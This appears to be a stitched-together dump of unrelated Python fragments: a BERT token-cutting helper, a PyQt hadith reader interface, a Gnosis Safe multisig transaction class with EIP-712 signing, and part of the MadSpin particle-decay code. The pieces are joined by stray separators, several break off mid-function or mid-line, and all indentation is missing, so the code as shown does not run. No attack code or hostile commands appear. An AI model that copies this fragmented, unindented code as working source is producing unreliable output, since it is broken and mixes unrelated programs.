unused_token = {}
for i in range(1, 100):
unused_token['[unused{}]'.format(i)] = i
from itertools import accumulate
import random
def cut_doc(tokens_a_id, answer_symbol_id_pos, answer_symbol, max_length):
before_part = tokens_a_id[0:answer_symbol_id_pos]
after_part = tokens_a_id[answer_symbol_id_pos:]
half_length = int(max_length / 2)
if len(before_part) < half_length: # cut at tail
st = 0
ed = min(len(before_part) + 1 + len(after_part), max_length - 3)
elif len(after_part) < half_length: # cut at head
ed = len(before_part) + 1 + len(after_part)
st = max(0, ed - (max_length - 3))
else: # cut at both sides
st = len(before_part) + 3 - half_length
ed = len(before_part) + half_length
output = tokens_a_id[st:ed]
assert tokens_a_id[answer_symbol_id_pos] in output
return output
unused_id = [tokenizer.vocab[unused_word] for unused_word in list(unused_token.keys())]
def replace_unused2mask(tokens_a_id, unused_id, mask_id):
for i, | |
import sys, os
from random import randint
from PyQt5 import QtCore, QtGui, QtWidgets
from source.hapi import HadithApi
from source.hconfig import HConfig
class Ui_Manager():
"""
This class is used to add hadith data to the user interface.
Methods
-------
initialize_ui()
Loads the source, book and title combo boxes and the hadith text.
_update_btn_icon()
Updates the path to the random icon to an absolute path.
_update_layout()
Updates the layout of the hadith reader so it supports the current
language.
_select_lang()
Event handler for the language menu items.
_next_btn_handler()
Even handler for the next button.
_prev_btn_handler()
Even handler for the previous button.
_rand_hadith()
Loads a random hadith in the hadith box.
_next_hadith()
Loads the next hadith.
_prev_hadith()
Loads the previous hadith.
_source_selected()
It loads the book and title combo boxes and also the hadith box.
_book_selected()
It loads the title combo box and the hadith box.
_get_current_selection()
It returns the currently selected source, book and title.
_load_hadith()
It updates the hadith box with the current hadith.
_load_source_list()
It loads the source combo box with list of sources.
_load_book_list()
It loads the book combo box with list of books.
_load_title_list()
It loads the title combo box with list of titles for the selected
hadith source and book.
_update_settings()
It saves the current settings to database.
_load_settings()
It loads the current settings from database.
"""
def initialize_ui(self, MainWindow: QtWidgets.QMainWindow) -> None:
"""It initializes the reader layout.
- It loads the source combo box with list of hadith sources.
- It loads the book combo box with books in the current hadith source.
- It loads the title combo box with titles in the current hadith source
and book.
- It displays hadith verses in the text area.
- It connects the source, book and title combo boxes to callbacks.
- It connects the next and previous buttons to callbacks.
- It sets the current language to Urdu.
:param MainWindow: The hadith reader window object.
:type MainWindow: QtWidgets.QMainWindow.
"""
# The application configuration
hconfig = HConfig()
self.config = hconfig.get_config()
# The current language
self.lang = self.config["default_lang"]
# Creates an instance of the HadithApi class
self.api = HadithApi(self.config["db_path"], self.lang)
# Loads settings from database
self._load_settings()
# The main window object is set as obj attribute
self.MainWindow = MainWindow
# The layout is updated for the new language
self._update_layout()
# Connects the source combo box to a call back
self.MainWindow.sourceComboBox.activated.connect(self._source_selected)
# Connects the book combo box to a call back
self.MainWindow.bookComboBox.activated.connect(self._book_selected)
# Connects the title combo box to a call back
self.MainWindow.titleComboBox.activated.connect(self._load_hadith_box)
# Connects the next button to a call back
self.MainWindow.nextButton.clicked.connect(self._next_btn_handler)
# Connects the prev button to a call back
self.MainWindow.prevButton.clicked.connect(self._prev_btn_handler)
# Connects the random button to a call back
self.MainWindow.randomButton.clicked.connect(self._rand_hadith)
# Connects the urdu checkbox menu item to a call back
self.MainWindow.actionUrdu.triggered.connect(self._select_lang)
# Connects the english checkbox menu item to a call back
self.MainWindow.actionEnglish.triggered.connect(self._select_lang)
# Connects the arabic checkbox menu item to a call back
self.MainWindow.actionArabic.triggered.connect(self._select_lang)
# Update the language menu so only one item can be selected at a time
self.MainWindow.langGroup.setExclusive(True)
# Updates the icon path
self._update_btn_icon()
# Loads the source combo box with list of sources
self._load_source_list()
# Loads the book combo box with list of books
self._load_book_list()
# Loads the title combo box with list of titles
self._load_title_list()
# Displays the hadith text
self._load_hadith_box()
def _update_btn_icon(self) -> None:
"""Updates the path to the random icon to an absolute path.
"""
# An icon is created
icon = QtGui.QIcon()
# The path to the random.png image
icon.addPixmap(
QtGui.QPixmap(self.config["random_icon_path"]),
QtGui.QIcon.Normal, QtGui.QIcon.Off)
# The icon is set
self.MainWindow.randomButton.setIcon(icon)
def _update_layout(self) -> None:
"""Updates the layout of the hadith reader so it supports the current
language.
The position of the combo boxes, labels and buttons is updated. The
locale and alignment of the combo boxes is also updated.
The current language in the language menu is checked
"""
# If the current language is "English"
if self.lang == "English":
# The English option is selected
self.MainWindow.actionEnglish.setChecked(True)
# The position of the combo boxes is updated
self.MainWindow.gridLayout.addWidget(
self.MainWindow.bookComboBox, 5, 1, 1, 1)
self.MainWindow.gridLayout.addWidget(
self.MainWindow.sourceComboBox, 5, 0, 1, 1)
self.MainWindow.gridLayout.addWidget(
self.MainWindow.titleComboBox, 5, 2, 1, 1)
self.MainWindow.gridLayout.addWidget(
self.MainWindow.sourceLabel, 2, 0, 1, 1)
self.MainWindow.gridLayout.addWidget(
self.MainWindow.bookLabel, 2, 1, 1, 1)
self.MainWindow.gridLayout.addWidget(
self.MainWindow.titleLabel, 2, 2, 1, 1)
self.MainWindow.gridLayout.addWidget(
self.MainWindow.prevButton, 5, 8, 1, 1)
self.MainWindow.gridLayout.addWidget(
self.MainWindow.randomButton, 5, 9, 1, 1)
self.MainWindow.gridLayout.addWidget(
self.MainWindow.nextButton, 5, 7, 1, 1)
# The direction of the combo boxes is updated
self.MainWindow.bookComboBox.setLayoutDirection(
QtCore.Qt.LeftToRight)
self.MainWindow.bookComboBox.setLocale(
QtCore.QLocale(
QtCore.QLocale.English, QtCore.QLocale.UnitedStates))
self.MainWindow.titleComboBox.setLayoutDirection(
QtCore.Qt.LeftToRight)
self.MainWindow.titleComboBox.setLocale(
QtCore.QLocale(
QtCore.QLocale.English, QtCore.QLocale.UnitedStates))
self.MainWindow.sourceComboBox.setLayoutDirection(
QtCore.Qt.LeftToRight)
self.MainWindow.sourceComboBox.setLocale(
QtCore.QLocale(
QtCore.QLocale.English, QtCore.QLocale.UnitedStates))
# The font for the combo boxes is updated
font = QtGui.QFont()
font.setFamily("DejaVu Sans")
font.setPointSize(10)
font.setBold(True)
self.MainWindow.bookComboBox.setFont(font)
self.MainWindow.titleComboBox.setFont(font)
self.MainWindow.sourceComboBox.setFont(font)
font.setBold(False)
font.setPointSize(12)
self.MainWindow.hadithText.setFont(font)
else:
# If the language is Urdu
if self.lang == "Urdu":
self.MainWindow.actionUrdu.setChecked(True)
else:
self.MainWindow.actionArabic.setChecked(True)
# The position of the combo boxes is updated
self.MainWindow.gridLayout.addWidget(
self.MainWindow.bookComboBox, 5, 9, 1, 1)
self.MainWindow.gridLayout.addWidget(
self.MainWindow.sourceComboBox, 5, 10, 1, 1)
self.MainWindow.gridLayout.addWidget(
self.MainWindow.titleComboBox, 5, 5, 1, 1)
self.MainWindow.gridLayout.addWidget(
self.MainWindow.sourceLabel, 2, 10, 1, 1)
self.MainWindow.gridLayout.addWidget(
self.MainWindow.bookLabel, 2, 9, 1, 1)
self.MainWindow.gridLayout.addWidget(
self.MainWindow.titleLabel, 2, 5, 1, 1)
self.MainWindow.gridLayout.addWidget(
self.MainWindow.randomButton, 5, 4, 1, 1)
self.MainWindow.gridLayout.addWidget(
self.MainWindow.nextButton, 5, 1, 1, 1)
self.MainWindow.gridLayout.addWidget(
self.MainWindow.prevButton, 5, 3, 1, 1)
# The layout of the combo boxes is updated
self.MainWindow.bookComboBox.setLayoutDirection(
QtCore.Qt.RightToLeft)
self.MainWindow.bookComboBox.setLocale(
QtCore.QLocale(QtCore.QLocale.Urdu, QtCore.QLocale.Pakistan))
self.MainWindow.titleComboBox.setLayoutDirection(
QtCore.Qt.RightToLeft)
self.MainWindow.titleComboBox.setLocale(
QtCore.QLocale(QtCore.QLocale.Urdu, QtCore.QLocale.Pakistan))
self.MainWindow.sourceComboBox.setLayoutDirection(
QtCore.Qt.RightToLeft)
self.MainWindow.sourceComboBox.setLocale(
QtCore.QLocale(QtCore.QLocale.Urdu, QtCore.QLocale.Pakistan))
# The font of the combo boxes is updated
font = QtGui.QFont()
font.setFamily("Nafees [PYRS]")
font.setPointSize(14)
font.setBold(False)
font.setWeight(50)
self.MainWindow.bookComboBox.setFont(font)
self.MainWindow.titleComboBox.setFont(font)
self.MainWindow.sourceComboBox.setFont(font)
font.setPointSize(18)
self.MainWindow.hadithText.setFont(font)
def _select_lang(self) -> None:
"""Event handler for the language menu items.
It sets the current language to the selected language. It changes the
language of the text in the hadith box to the selected language.
"""
# The translate function
_translate = QtCore.QCoreApplication.translate
# The status text and shortcut keys are updated
self.MainWindow.nextButton.setStatusTip(_translate("MainWindow",
"Next Hadith (Ctrl+N)"))
self.MainWindow.nextButton.setShortcut(_translate("MainWindow",
"Ctrl+N"))
self.MainWindow.prevButton.setStatusTip(_translate("MainWindow",
"Previous Hadith (Ctrl+P)"))
self.MainWindow.prevButton.setShortcut(_translate("MainWindow",
"Ctrl+P"))
# If the currently selected language is Urdu
if self.MainWindow.actionUrdu.isChecked():
# The current language is set
self.lang = "Urdu"
# If the currently selected language is English
elif self.MainWindow.actionEnglish.isChecked():
# The current language is set
self.lang = "English"
# The status text and shortcut keys are updated
self.MainWindow.nextButton.setStatusTip(_translate("MainWindow",
"Previous Hadith (Ctrl+P)"))
self.MainWindow.nextButton.setShortcut(_translate("MainWindow",
"Ctrl+P"))
self.MainWindow. prevButton.setStatusTip(_translate("MainWindow",
"Next Hadith (Ctrl+N)"))
self.MainWindow.prevButton.setShortcut(_translate("MainWindow",
"Ctrl+N"))
# If the currently selected language is Arabic
elif self.MainWindow.actionArabic.isChecked():
# The current language is set
self.lang = "Arabic"
# The layout is updated for the new language
self._update_layout()
# The current language is set in the api object
self.api.set_lang(self.lang)
# Loads the source combo box with list of sources
self._load_source_list()
# Loads the book combo box with list of books
self._load_book_list()
# Loads the title combo box with list of titles
self._load_title_list()
# Loads the hadith box with text
self._load_hadith_box()
# The settings are updated in database
self._update_settings()
def _next_btn_handler(self) -> None:
"""Even handler for the next button.
If the current language is "en", then it calls the _prev_hadith method.
Otherwise it calls the _next_hadith method.
"""
# If the current language is "English"
if self.lang == "English":
# The _prev_hadith method is called
self._prev_hadith()
else:
# The _next_hadith method is called
self._next_hadith()
# The settings are updated in database
self._update_settings()
def _prev_btn_handler(self) -> None:
"""Even handler for the prev button.
If the current language is "English", then it calls the _next_hadith
method. Otherwise it calls the _prev_hadith method.
"""
# If the current language is "English"
if self.lang == "English":
# The _next_hadith method is called
self._next_hadith()
else:
# The _prev_hadith method is called
self._prev_hadith()
# The settings are updated in database
self._update_settings()
| |
<gh_stars>0
from typing import Any, Dict, List, NoReturn, Optional, Tuple, Type
from eip712_structs import Address, Bytes, EIP712Struct, Uint, make_domain
from eip712_structs.struct import StructTuple
from eth_account import Account
from hexbytes import HexBytes
from packaging.version import Version
from web3 import Web3
from web3.exceptions import BadFunctionCallOutput, ContractLogicError
from web3.types import BlockIdentifier, TxParams, Wei
from gnosis.eth import EthereumClient
from gnosis.eth.constants import NULL_ADDRESS
from gnosis.eth.contracts import get_safe_contract
from ..eth.ethereum_client import TxSpeed
from .exceptions import (
CouldNotFinishInitialization,
CouldNotPayGasWithEther,
CouldNotPayGasWithToken,
HashHasNotBeenApproved,
InvalidContractSignatureLocation,
InvalidInternalTx,
InvalidMultisigTx,
InvalidOwnerProvided,
InvalidSignaturesProvided,
MethodCanOnlyBeCalledFromThisContract,
ModuleManagerException,
NotEnoughSafeTransactionGas,
OnlyOwnersCanApproveAHash,
OwnerManagerException,
SafeTransactionFailedWhenGasPriceAndSafeTxGasEmpty,
SignatureNotProvidedByOwner,
SignaturesDataTooShort,
ThresholdNeedsToBeDefined,
)
from .safe_signature import SafeSignature
from .signatures import signature_to_bytes
try:
from functools import cached_property
except ImportError:
from cached_property import cached_property
class EIP712SafeTx(EIP712Struct):
to = Address()
value = Uint(256)
data = Bytes()
operation = Uint(8)
safeTxGas = Uint(256)
baseGas = Uint(256) # `dataGas` was renamed to `baseGas` in 1.0.0
gasPrice = Uint(256)
gasToken = Address()
refundReceiver = Address()
nonce = Uint(256)
class EIP712LegacySafeTx(EIP712Struct):
to = Address()
value = Uint(256)
data = Bytes()
operation = Uint(8)
safeTxGas = Uint(256)
dataGas = Uint(256)
gasPrice = Uint(256)
gasToken = Address()
refundReceiver = Address()
nonce = Uint(256)
EIP712SafeTx.type_name = "SafeTx"
EIP712LegacySafeTx.type_name = "SafeTx"
class SafeTx:
tx: TxParams # If executed, `tx` is set
tx_hash: bytes # If executed, `tx_hash` is set
def __init__(
self,
ethereum_client: EthereumClient,
safe_address: str,
to: str,
value: int,
data: bytes,
operation: int,
safe_tx_gas: int,
base_gas: int,
gas_price: int,
gas_token: str,
refund_receiver: str,
signatures: bytes = b"",
safe_nonce: Optional[int] = None,
safe_version: str = None,
chain_id: Optional[int] = None,
):
"""
:param ethereum_client:
:param safe_address:
:param to:
:param value:
:param data:
:param operation:
:param safe_tx_gas:
:param base_gas:
:param gas_price:
:param gas_token:
:param refund_receiver:
:param signatures:
:param safe_nonce: Current nonce of the Safe. If not provided, it will be retrieved from network
:param safe_version: Safe version 1.0.0 renamed `baseGas` to `dataGas`. Safe version 1.3.0 added `chainId` to
the `domainSeparator`. If not provided, it will be retrieved from network
:param chain_id: Ethereum network chain_id is used in hash calculation for Safes >= 1.3.0. If not provided,
it will be retrieved from the provided ethereum_client
"""
assert isinstance(signatures, bytes), "Signatures must be bytes"
self.ethereum_client = ethereum_client
self.safe_address = safe_address
self.to = to or NULL_ADDRESS
self.value = value
self.data = HexBytes(data) if data else b""
self.operation = operation
self.safe_tx_gas = safe_tx_gas
self.base_gas = base_gas
self.gas_price = gas_price
self.gas_token = gas_token or NULL_ADDRESS
self.refund_receiver = refund_receiver or NULL_ADDRESS
self.signatures = signatures
self._safe_nonce = safe_nonce
self._safe_version = safe_version
self._chain_id = chain_id
def __str__(self):
return (
f"SafeTx - safe={self.safe_address} - to={self.to} - value={self.value} - data={self.data.hex()} - "
f"operation={self.operation} - safe-tx-gas={self.safe_tx_gas} - base-gas={self.base_gas} - "
f"gas-price={self.gas_price} - gas-token={self.gas_token} - refund-receiver={self.refund_receiver} - "
f"signers = {self.signers}"
)
@property
def w3(self):
return self.ethereum_client.w3
@cached_property
def contract(self):
return get_safe_contract(self.w3, address=self.safe_address)
@cached_property
def chain_id(self) -> int:
if self._chain_id is not None:
return self._chain_id
else:
return self.w3.eth.chain_id
@cached_property
def safe_nonce(self) -> str:
if self._safe_nonce is not None:
return self._safe_nonce
else:
return self.contract.functions.nonce().call()
@cached_property
def safe_version(self) -> str:
if self._safe_version is not None:
return self._safe_version
else:
return self.contract.functions.VERSION().call()
@property
def _eip712_payload(self) -> StructTuple:
data = self.data.hex() if self.data else ""
safe_version = Version(self.safe_version)
cls = EIP712SafeTx if safe_version >= Version("1.0.0") else EIP712LegacySafeTx
message = cls(
to=self.to,
value=self.value,
data=data,
operation=self.operation,
safeTxGas=self.safe_tx_gas,
baseGas=self.base_gas,
dataGas=self.base_gas,
gasPrice=self.gas_price,
gasToken=self.gas_token,
refundReceiver=self.refund_receiver,
nonce=self.safe_nonce,
)
domain = make_domain(
verifyingContract=self.safe_address,
chainId=self.chain_id if safe_version >= Version("1.3.0") else None,
)
return StructTuple(message, domain)
@property
def eip712_structured_data(self) -> Dict:
message, domain = self._eip712_payload
return message.to_message(domain)
@property
def safe_tx_hash(self) -> HexBytes:
message, domain = self._eip712_payload
signable_bytes = message.signable_bytes(domain)
return HexBytes(Web3.keccak(signable_bytes))
@property
def signers(self) -> List[str]:
if not self.signatures:
return []
else:
return [
safe_signature.owner
for safe_signature in SafeSignature.parse_signature(
self.signatures, self.safe_tx_hash
)
]
@property
def sorted_signers(self):
return sorted(self.signers, key=lambda x: int(x, 16))
@property
def w3_tx(self):
"""
:return: Web3 contract tx prepared for `call`, `transact` or `buildTransaction`
"""
return self.contract.functions.execTransaction(
self.to,
self.value,
self.data,
self.operation,
self.safe_tx_gas,
self.base_gas,
self.gas_price,
self.gas_token,
self.refund_receiver,
self.signatures,
)
def _raise_safe_vm_exception(self, message: str) -> NoReturn:
error_with_exception: Dict[str, Type[InvalidMultisigTx]] = {
# https://github.com/gnosis/safe-contracts/blob/v1.3.0/docs/error_codes.md
"GS000": CouldNotFinishInitialization,
"GS001": ThresholdNeedsToBeDefined,
"Could not pay gas costs with ether": CouldNotPayGasWithEther,
"GS011": CouldNotPayGasWithEther,
"Could not pay gas costs with token": CouldNotPayGasWithToken,
"GS012": CouldNotPayGasWithToken,
"GS013": SafeTransactionFailedWhenGasPriceAndSafeTxGasEmpty,
"Hash has not been approved": HashHasNotBeenApproved,
"Hash not approved": HashHasNotBeenApproved,
"GS025": HashHasNotBeenApproved,
"Invalid contract signature location: data not complete": InvalidContractSignatureLocation,
"GS023": InvalidContractSignatureLocation,
"Invalid contract signature location: inside static part": InvalidContractSignatureLocation,
"GS021": InvalidContractSignatureLocation,
"Invalid contract signature location: length not present": InvalidContractSignatureLocation,
"GS022": InvalidContractSignatureLocation,
"Invalid contract signature provided": InvalidContractSignatureLocation,
"GS024": InvalidContractSignatureLocation,
"Invalid owner provided": InvalidOwnerProvided,
"Invalid owner address provided": InvalidOwnerProvided,
"GS026": InvalidOwnerProvided,
"Invalid signatures provided": InvalidSignaturesProvided,
"Not enough gas to execute safe transaction": NotEnoughSafeTransactionGas,
"GS010": NotEnoughSafeTransactionGas,
"Only owners can approve a hash": OnlyOwnersCanApproveAHash,
"GS030": OnlyOwnersCanApproveAHash,
"GS031": MethodCanOnlyBeCalledFromThisContract,
"Signature not provided by owner": SignatureNotProvidedByOwner,
"Signatures data too short": SignaturesDataTooShort,
"GS020": SignaturesDataTooShort,
# ModuleManager
"GS100": ModuleManagerException,
"Invalid module address provided": ModuleManagerException,
"GS101": ModuleManagerException,
"GS102": ModuleManagerException,
"Invalid prevModule, module pair provided": ModuleManagerException,
"GS103": ModuleManagerException,
"Method can only be called from an enabled module": ModuleManagerException,
"GS104": ModuleManagerException,
"Module has already been added": ModuleManagerException,
# OwnerManager
"Address is already an owner": OwnerManagerException,
"GS200": OwnerManagerException, # Owners have already been setup
"GS201": OwnerManagerException, # Threshold cannot exceed owner count
"GS202": OwnerManagerException, # Invalid owner address provided
"GS203": OwnerManagerException, # Invalid ower address provided
"GS204": OwnerManagerException, # Address is already an owner
"GS205": OwnerManagerException, # Invalid prevOwner, owner pair provided
"Invalid prevOwner, owner pair provided": OwnerManagerException,
"New owner count needs to be larger than new threshold": OwnerManagerException,
"Threshold cannot exceed owner count": OwnerManagerException,
"Threshold needs to be greater than 0": OwnerManagerException,
}
for reason, custom_exception in error_with_exception.items():
if reason in message:
raise custom_exception(message)
raise InvalidMultisigTx(message)
def call(
self,
tx_sender_address: Optional[str] = None,
tx_gas: Optional[int] = None,
block_identifier: Optional[BlockIdentifier] = "latest",
) -> int:
"""
:param tx_sender_address:
:param tx_gas: Force a gas limit
:param block_identifier:
:return: `1` if everything ok
"""
parameters: Dict[str, Any] = {
"from": tx_sender_address if tx_sender_address else self.safe_address
}
if tx_gas:
parameters["gas"] = tx_gas
try:
success = self.w3_tx.call(parameters, block_identifier=block_identifier)
if not success:
raise InvalidInternalTx(
"Success bit is %d, should be equal to 1" % success
)
return success
except (ContractLogicError, BadFunctionCallOutput) as exc:
# e.g. web3.exceptions.ContractLogicError: execution reverted: Invalid owner provided
return self._raise_safe_vm_exception(str(exc))
except ValueError as exc: # Parity
"""
Parity throws a ValueError, e.g.
{'code': -32015,
'message': 'VM execution error.',
'data': 'Reverted 0x08c379a0000000000000000000000000000000000000000000000000000000000000020000000000000000
000000000000000000000000000000000000000000000001b496e76616c6964207369676e6174757265732070726f7669
6465640000000000'
}
"""
error_dict = exc.args[0]
data = error_dict.get("data")
if data and isinstance(data, str) and "Reverted " in data:
# Parity
result = HexBytes(data.replace("Reverted ", ""))
return self._raise_safe_vm_exception(str(result))
else:
raise exc
def recommended_gas(self) -> Wei:
"""
:return: Recommended gas to use on the ethereum_tx
"""
return Wei(self.base_gas + self.safe_tx_gas + 75000)
def execute(
self,
tx_sender_private_key: str,
tx_gas: Optional[int] = None,
tx_gas_price: Optional[int] = None,
tx_nonce: Optional[int] = None,
block_identifier: Optional[BlockIdentifier] = "latest",
eip1559_speed: Optional[TxSpeed] = None,
) -> Tuple[HexBytes, TxParams]:
"""
Send multisig tx to the Safe
:param tx_sender_private_key: Sender private key
:param tx_gas: Gas for the external tx. If not, `(safe_tx_gas + base_gas) * 2` will be used
:param tx_gas_price: Gas price of the external tx. If not, `gas_price` will be used
:param tx_nonce: Force nonce for `tx_sender`
:param block_identifier: `latest` or `pending`
:param eip1559_speed: If provided, use EIP1559 transaction
:return: Tuple(tx_hash, tx)
:raises: InvalidMultisigTx: If user tx cannot go through the Safe
"""
sender_account = Account.from_key(tx_sender_private_key)
if eip1559_speed and self.ethereum_client.is_eip1559_supported():
tx_parameters = self.ethereum_client.set_eip1559_fees(
{
"from": sender_account.address,
},
tx_speed=eip1559_speed,
)
else:
tx_parameters = {
"from": sender_account.address,
"gasPrice": tx_gas_price or self.gas_price or self.w3.eth.gas_price,
}
if tx_gas:
tx_parameters["gas"] = tx_gas
if tx_nonce is not None:
tx_parameters["nonce"] = tx_nonce
self.tx = self.w3_tx.buildTransaction(tx_parameters)
self.tx["gas"] = Wei(
tx_gas or (max(self.tx["gas"] + 75000, self.recommended_gas()))
)
self.tx_hash = self.ethereum_client.send_unsigned_transaction(
self.tx,
private_key=sender_account.key,
retry=False if tx_nonce is not None else True,
block_identifier=block_identifier,
)
# Set signatures empty after executing the tx. `Nonce` is increased even if it fails,
# so signatures are not valid anymore
self.signatures = b""
return self.tx_hash, self.tx
def sign(self, private_key: str) -> bytes:
"""
{bytes32 r}{bytes32 s}{uint8 v}
:param private_key:
:return: Signature
"""
account = Account.from_key(private_key)
signature_dict = account.signHash(self.safe_tx_hash)
signature = signature_to_bytes(
signature_dict["v"], signature_dict["r"], signature_dict["s"]
)
# Insert signature sorted
if account.address | |
decay['decay_tag'],BWvalue))
if weight > 10.0 * decay['max_weight']:
error = """Found a weight MUCH larger than the computed max_weight (ratio: %s).
This usually means that the Narrow width approximation reaches it's limit on part of the Phase-Space.
Do not trust too much the tale of the distribution and/or relaunch the code with smaller BW_cut.
This is for channel %s with current BW_value at : %g'""" \
% (weight/decay['max_weight'], decay['decay_tag'], BWvalue)
logger.error(error)
elif report['over_weight'] > max(0.005*event_nb,3):
error = """Found too many weight larger than the computed max_weight (%s/%s = %s%%).
Please relaunch MS with more events/PS point by event in the
computation of the maximum_weight.
""" % (report['over_weight'], event_nb, 100 * report['over_weight']/event_nb )
raise MadSpinError(error)
error = True
elif report['%s_f' % (decay['decay_tag'],)] > max(0.01*report[decay['decay_tag']],3):
error = """Found too many weight larger than the computed max_weight (%s/%s = %s%%),
for channel %s. Please relaunch MS with more events/PS point by event in the
computation of the maximum_weight.
""" % (report['%s_f' % (decay['decay_tag'],)],\
report['%s' % (decay['decay_tag'],)],\
100 * report['%s_f' % (decay['decay_tag'],)] / report[ decay['decay_tag']] ,\
decay['decay_tag'])
raise MadSpinError(error)
decayed_event.change_wgt(factor= self.branching_ratio)
#decayed_event.wgt = decayed_event.wgt * self.branching_ratio
self.outputfile.write(decayed_event.string_event())
#print "number of trials: "+str(trial_nb)
trial_nb_all_events+=trial_nb
self.outputfile.write('</LesHouchesEvents>\n')
self.evtfile.close()
self.outputfile.close()
if report['over_weight'] > max(0.15*math.sqrt(event_nb),1):
error = """Found many weight larger than the computed max_weight (%s/%s = %s%%).
""" % (report['over_weight'], event_nb, 100 * report['over_weight']/event_nb )
logger.warning(error)
for decay_tag in self.all_decay.keys():
if report['%s_f' % (decay_tag,)] > max(0.2*report[decay_tag],1):
error = """Found many weight larger than the computed max_weight (%s/%s = %s%%),
for channel %s.""" % (report['%s_f' % (decay_tag,)],\
report['%s' % (decay_tag,)],\
100 * report['%s_f' % (decay_tag,)] / report[decay_tag] ,\
decay_tag)
logger.warning(error)
logger.info('Total number of events written: %s/%s ' % (event_nb, event_nb+nb_skip))
logger.info('Average number of trial points per production event: '\
+str(float(trial_nb_all_events)/float(event_nb)))
logger.info('Branching ratio to allowed decays: %g' % self.branching_ratio)
logger.info('Number of events with weights larger than max_weight: %s' % report['over_weight'])
logger.info('Number of subprocesses '+str(len(self.calculator)))
logger.info('Number of failures when restoring the Monte Carlo masses: %s ' % nb_fail_mc_mass)
if fail_nb:
logger.info('Number of failures in reshuffling (event skipped): %s ' % fail_nb)
return event_nb/(event_nb+nb_skip)
def adding_only_helicity(self, event_map, production_tag):
"""no decays for this production mode, run in passthrough mode,
only adding the helicities to the events """
#no decays for this production mode, run in passthrough mode, only adding the helicities to the events
nb_mc_masses=0
p, p_str=self.curr_event.give_momenta(event_map)
stdin_text=' %s %s %s %s \n' % ('2', self.options['BW_cut'], self.Ecollider, 1.0, self.options['frame_id'])
stdin_text+=p_str
# here I also need to specify the Monte Carlo Masses
stdin_text+=" %s \n" % nb_mc_masses
mepath = self.all_ME[production_tag]['path']
decay = self.all_ME[production_tag]['decays'][0]
decay_me=self.all_ME.get_decay_from_tag(production_tag, decay['decay_tag'])
mepath = decay_me['path']
output = self.loadfortran( 'unweighting', mepath, stdin_text)
if not output:
# Event fail
return 0, 1
trial_nb, BWvalue, weight, momenta, failed, use_mc_masses, helicities = output
self.reset_helicityonly_in_prod_event(event_map, helicities)
decayed_event = self.curr_event
self.outputfile.write(decayed_event.string_event())
#print "number of trials: "+str(trial_nb)
return trial_nb, 0
def get_int_mom_in_decay(self,decay_struct,ext_mom):
""" fill """
momenta_in_decay={}
for part in decay_struct.keys():
branch=decay_struct[part]['mg_tree']
nb_splitting=len(branch)
for split in range(nb_splitting-1,-1,-1):
mother=branch[split][0]
d1=branch[split][1]
d2=branch[split][2]
if d1>0:
momenta_in_decay[d1]=ext_mom[d1-1] # list_momenta is ordered according to ME
if d2>0:
momenta_in_decay[d2]=ext_mom[d2-1] # list_momenta is ordered according to ME
momenta_in_decay[mother]=momenta_in_decay[d1].add(momenta_in_decay[d2])
return momenta_in_decay
def reset_mom_in_prod_event(self, decay_struct,prod2full, event_map, momenta_in_decay,ext_mom,use_mc_masses,helicities):
""" Reset the external momenta in the production event, since
the virtuality of decaying particles has slightly changed the kinematics
"""
for index in self.curr_event.event2mg.keys():
if self.curr_event.event2mg[index]>0:
part=self.curr_event.event2mg[index] # index for production ME
part_for_curr_evt=event_map[part-1]+1 # index for curr event
pid=self.curr_event.particle[part_for_curr_evt]['pid']
if part in decay_struct:
id_res=decay_struct[part]['mg_tree'][0][0]
self.curr_event.particle[part_for_curr_evt]['momentum']=momenta_in_decay[id_res].copy()
self.curr_event.particle[part_for_curr_evt]['mass']=self.curr_event.particle[part_for_curr_evt]['momentum'].m
else:
self.curr_event.particle[part_for_curr_evt]['momentum']=ext_mom[prod2full[part-1]-1]
self.curr_event.particle[part_for_curr_evt]['helicity']=helicities[prod2full[part-1]-1]
if not use_mc_masses or abs(pid) not in self.MC_masses:
try:
self.curr_event.particle[part_for_curr_evt]['mass']=self.banner.get('param_card','mass', abs(pid)).value
except KeyError:
if self.model.get_particle(abs(pid)).get('mass').lower() == 'zero':
self.curr_event.particle[part_for_curr_evt]['mass'] = 0
else:
raise
else:
self.curr_event.particle[part_for_curr_evt]['mass']=self.MC_masses[abs(pid)]
def reset_helicityonly_in_prod_event(self, event_map, helicities):
""" Reset the external momenta in the production event, since
the virtuality of decaying particles has slightly changed the kinematics
"""
for index in self.curr_event.event2mg.keys():
if self.curr_event.event2mg[index]>0:
part=self.curr_event.event2mg[index] # index for production ME
part_for_curr_evt=event_map[part-1]+1 # index for curr event
pid=self.curr_event.particle[part_for_curr_evt]['pid']
self.curr_event.particle[part_for_curr_evt]['helicity']=helicities[part-1]
def get_mom(self,momenta):
""" input: list of momenta in a string format
output: list of momenta in a 'momentum' format
"""
output=[]
for item in momenta:
comps=item.split()
mom=momentum(float(comps[0]),float(comps[1]),float(comps[2]),float(comps[3]))
output.append(mom)
return output
def get_identical_decay(self):
"""identify the various decay which are identical to each other"""
logger.info('detect independant decays')
start = time.time()
# Possbilitiy to Bypass this step
if len(self.all_decay) == 1:
relation = {}
base_tag = None
for prod in self.all_ME.values():
for decay in prod['decays']:
tags = decay['decay_tag']
for tag in tags:
if not base_tag:
relation[tag] = (tag, 1)
base_tag = tag
elif (tag,1) not in relation[base_tag]:
relation[tag] = (base_tag,1)
decay_mapping = self.get_process_identical_ratio(relation)
return decay_mapping
BW_cut = self.options['BW_cut']
#class the decay by class (nbody/pid)
nbody_to_decay = collections.defaultdict(list)
for decay in self.all_decay.values():
id = decay['dc_branch']['tree'][-1]['label']
id_final = decay['processes'][0].get_final_ids_after_decay()
cut = 0.0
mass_final = tuple([m if m> cut else 0 for m in map(self.pid2mass, id_final)])
nbody_to_decay[(decay['nbody'], abs(id), mass_final)].append(decay)
relation = {} # {tag: {(tag2, ratio)}}
# Loop over the class and create the relation information about the 1
for ((nbody, pid, finals),decays) in nbody_to_decay.items():
if len(decays) == 1:
continue
mom_init = momentum(self.pid2mass(pid), 0, 0, 0)
# create an object for the validation, keeping the ratio between
# MEM i and MEM j. this is set at zero when the ratio is not found
#constant
valid = dict([ ((i, j), True) for j in range(len(decays))
for i in range(len(decays))
if i != j])
for nb in range(125):
tree, jac, nb_sol = decays[0]['dc_branch'].generate_momenta(mom_init,\
True, self.pid2width, self.pid2mass, BW_cut,self.Ecollider)
if not tree:
continue
p_str = '%s\n%s\n'% (tree[-1]['momentum'],
'\n'.join(str(tree[i]['momentum']) for i in range(1, len(tree))
if i in tree))
values = {}
for i in range(len(decays)):
if any([valid[(i,j)] for j in range(len(decays)) if i !=j]):
values[i] = self.calculate_matrix_element('decay',
